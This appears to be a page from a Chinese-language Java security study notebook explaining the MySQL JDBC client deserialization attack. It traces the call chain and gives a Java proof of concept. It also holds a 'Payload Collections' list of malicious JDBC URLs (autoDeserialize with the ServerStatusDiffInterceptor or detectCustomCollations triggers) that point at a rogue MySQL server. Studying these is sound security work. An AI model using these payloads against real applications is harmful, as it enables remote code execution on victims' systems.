Java
  • About This Book
  • 🍖Prerequisites
    • 反射
      • 反射基本使用
      • 高版本JDK反射绕过
      • 反射调用命令执行
      • 反射构造HashMap
      • 方法句柄
    • 类加载
      • 动态加载字节码
      • 双亲委派模型
      • BCEL
      • SPI
    • RMI & JNDI
      • RPC Intro
      • RMI
      • JEP 290
      • JNDI
    • Misc
      • Unsafe
      • 代理模式
      • JMX
      • JDWP
      • JPDA
      • JVMTI
      • JNA
      • Java Security Manager
  • 👻Serial Journey
    • URLDNS
    • SerialVersionUID
    • Commons Collection 🥏
      • CC1-TransformedMap
      • CC1-LazyMap
      • CC6
      • CC3
      • CC2
    • FastJson 🪁
      • FastJson-Basic Usage
      • FastJson-TemplatesImpl
      • FastJson-JdbcRowSetImpl
      • FastJson-BasicDataSource
      • FastJson-ByPass
      • FastJson与原生反序列化(一)
      • FastJson与原生反序列化(二)
      • Jackson的原生反序列化利用
    • Other Components
      • SnakeYaml
      • C3P0
      • AspectJWeaver
      • Rome
      • Spring
      • Hessian
      • Hessian_Only_JDK
      • Kryo
      • Dubbo
  • 🌵RASP
    • JavaAgent
    • JVM
    • ByteCode
    • JNI
    • ASM 🪡
      • ASM Intro
      • Class Generation
      • Class Transformation
    • Rasp防御命令执行
    • OpenRASP
  • 🐎Memory Shell
    • Tomcat-Architecture
    • Servlet API
      • Listener
      • Filter
      • Servlet
    • Tomcat-Middlewares
      • Tomcat-Valve
      • Tomcat-Executor
      • Tomcat-Upgrade
    • Agent MemShell
    • WebSocket
    • 内存马查杀
    • IDEA本地调试Tomcat
  • ✂️JDBC Attack
    • MySQL JDBC Attack
    • H2 JDBC Attack
  • 🎨Templates
    • FreeMarker
    • Thymeleaf
    • Enjoy
  • 🎏MessageQueue
    • ActiveMQ CNVD-2023-69477
    • AMQP CVE-2023-34050
    • Spring-Kafka CVE-2023-34040
    • RocketMQ CVE-2023-33246
  • 🛡️Shiro
    • Shiro Intro
    • Request URI ByPass
    • Context Path ByPass
    • Remember Me反序列化 CC-Shiro
    • CB1与无CC依赖的反序列化链
  • 🍺Others
    • Deserialization Twice
    • A New Blazer 4 getter RCE
    • Apache Commons Jxpath
    • El Attack
    • Spel Attack
    • C3P0原生反序列化的JNDI打法
    • Log4j
    • Echo Tech
      • SpringBoot Under Tomcat
    • CTF 🚩
      • 长城杯-b4bycoffee (ROME反序列化)
      • MTCTF2022(CB+Shiro绕过)
      • CISCN 2023 西南赛区半决赛 (Hessian原生JDK+Kryo反序列化)
      • CISCN 2023 初赛 (高版本Commons Collections下其他依赖的利用)
      • CISCN 2021 总决赛 ezj4va (AspectJWeaver写字节码文件到classpath)
      • D^3CTF2023 (新的getter+高版本JNDI不出网+Hessian异常toString)
      • WMCTF2023(CC链花式玩法+盲读文件)
      • 第六届安洵杯网络安全挑战赛(CB PriorityQueue替代+Postgresql JDBC Attack+FreeMarker)
  • 🔍Code Inspector
    • CodeQL 🧶
      • Tutorial
        • Intro
        • Module
        • Predicate
        • Query
        • Type
      • CodeQL 4 Java
        • Basics
        • DFA
        • Example
    • SootUp ✨
      • Intro
      • Jimple
      • DFA
      • CG
    • Tabby 🔦
      • install
    • Theory
      • Static Analysis
        • Intro
        • IR & CFG
        • DFA
        • DFA-Foundation
        • Interprocedural Analysis
        • Pointer Analysis
        • Pointer Analysis Foundation
        • PTA-Context Sensitivity
        • Taint Anlysis
        • Datalog
Powered by GitBook
On this page
  • 0x01 JDBC Deserial
  • 0x02 Payload Collections
  • ServerStatusDiffInterceptor触发
  • detectCustomCollations触发
  • 0x03 Reference

Was this helpful?

  1. ✂️JDBC Attack

MySQL JDBC Attack

PreviousIDEA本地调试TomcatNextH2 JDBC Attack

Last updated 2 years ago

Was this helpful?

0x01 JDBC Deserial

JDBC(Java DataBase Connectivity)是SUN公司发布的一个java程序与数据库之间通信的接口(规范),各大数据库厂商去实现JDBC规范,并将实现类打包成jar包

进行数据库连接时指定了数据库的URL及连接配置

Connection con = DriverManager.getConnection("jdbc:mysql://localhost:3306/test","root", "root");

若JDBC连接的URL被攻击者控制,就可以让其指向恶意的MySQL服务器

JDBC连接MySQL服务端时,会有几个内置的SQL查询语句会执行,查询的结果集会在MySQL客户端被处理时会调用ObjectInputStream#readObject进行反序列化。

攻击者可以搭建恶意MySQL服务器,返回精心构造的查询结果集,进行客户端反序列化攻击。

可被利用的两条查询语句:

  • SHOW SESSION STATUS

  • SHOW COLLATION

恶意MySQL服务器搭建:

  • https://github.com/fnmsd/MySQL_Fake_Server 📌

  • https://github.com/rmb122/rogue_mysql_server

<dependency>
    <groupId>mysql</groupId>
    <artifactId>mysql-connector-java</artifactId>
    <version>8.0.13</version>
</dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>
import java.sql.*;


public class Test {
    public static void main(String[] args) throws Exception {
        Class.forName("com.mysql.jdbc.Driver");
        String jdbc_url = "jdbc:mysql://127.0.0.1:3306/test?" +
            "autoDeserialize=true" +
       "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections7_calc";
        Connection con = DriverManager.getConnection(jdbc_url, "yso_CommonsCollections7_calc", "root");
    }
}

DriverManager#getConnection

👇

connectOneTryOnly=>this.session.setQueryInterceptors(this.queryInterceptors);

设置对应的查询拦截器(即我们指定的ServerStatusDiffInterceptor)

执行查询语句会调用拦截器的preProcess和postProcess

判断拦截器是否为空,非空则调用invokeQueryInterceptorsPre

invokeQueryInterceptorsPre调用了拦截器的preProcess

看到执行了SHOW SESSION STATUS,并将结果(com.mysql.cj.jdbc.result.ResultSetImpl)传入ResultSetUtil#resultSetToMap进行反序列化处理

public static void resultSetToMap(Map mappedValues, ResultSet rs) throws SQLException {
    while (rs.next()) {
        mappedValues.put(rs.getObject(1), rs.getObject(2));
    }
}
// getObject(2)
if (field.isBinary() || field.isBlob()) {
    byte[] data = getBytes(columnIndex);
}

getObject判断MySQL类型为BLOB后,从MySQL服务端获取对应的字节码数据

从MySQL服务端获取到字节码数据后,判断autoDeserialize是否为true(连接URL中设置了autoDeserialize=true)、字节码数据是否为序列化对象(前两个字节为-84和-19标识序列化对象)等,最后调用readObject触发反序列化漏洞

0x02 Payload Collections

ServerStatusDiffInterceptor触发

8.x<=8.0.20

jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

6.x

queryInterceptors改名statementInterceptors

jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

>=5.1.11

包名不含cj

jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor

5.x<=5.1.10

同上,需要连接后执行查询

detectCustomCollations触发

5.1.29~5.1.40

jdbc:mysql://x.x.x.x:3306/test?detectCustomCollations=true&autoDeserialize=true

5.1.19~5.1.28

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true

0x03 Reference

[MySQL JDBC反序列化漏洞

Mi1k7ea ]
MySQL JDBC 客户端反序列化漏洞分析-安全客 - 安全资讯平台 (anquanke.com)
image-20230123013436497
image-20230328204414675
image-20230328204534640
image-20230328204912985
image-20230328215913350
image-20230328215340798